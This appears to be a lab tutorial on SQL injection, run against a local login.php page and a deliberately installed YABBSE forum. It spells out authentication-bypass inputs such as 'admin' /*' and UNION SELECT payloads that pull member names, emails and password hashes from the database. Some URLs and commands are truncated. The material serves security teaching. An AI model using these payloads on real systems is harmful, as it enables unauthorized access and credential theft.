I. Manipulating login.php Script
 Open the terminal and type (without prepending prompt symbols):
$ su -
These commands will start all needed services in the background.
 Open the browser and check http://localhost/phpmyadmin/.
 Have a look at the databse userdb that our login.php script is accessing
 Have a look at login.php script. To do this, open another terminal and type:
$ vi login.php
or, in case you are not familiar with vi text editor, you can use more user friendly mcedit (or any other editor you wish):
$ mcedit login.php
 If you want to see the submitted query to get more information, delete prepending slashes in echo "$query
 Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:
 Enter username admin which we know is existing. As you can see, we cannot login due to the missing password.
 Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.
 Enter admin' OR 1=1 as username and see what happens.
 Out of the query we can see that we have a closing single quote that isn't opened.
 Enter admin 'OR 1='1 as username. Now the query is valid and we're in:
 To advance the attack you might whant to check out the /* to comment out all the following. Enter admin' /*" as username then and check the query:
SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''
is what we entered, but only the part before /* is proccessed by the database. This is why the statement is valid.
II. UNION SELECT
 We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.
 Open the script in the console by typing:
$ vi /yabbse/SSI.php
or use whichever editor you want. Now move to the line 222, where the query we are trying to manipulate is located.
 To get into the function recentTopics, call http://localhost/yabbse/SSI.php?func...r />  In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL Injection attack.
 Out of the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query.
 Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. Out of the error message, we can see that the inserted SELECT statement doesn't have the equal number of queries. We have to add something to make it equal then.
 Move your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:
 Have a look at line 223 and below. There is a HTML parser to be found that shows the result of our query. So what we have to do now is to mix around our null statements.
 Move to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted:
 Return to a terminal opened at the beginning (or open a new one) and issue commands:
$ su -
This will stop all services needed to pass through this tutorial.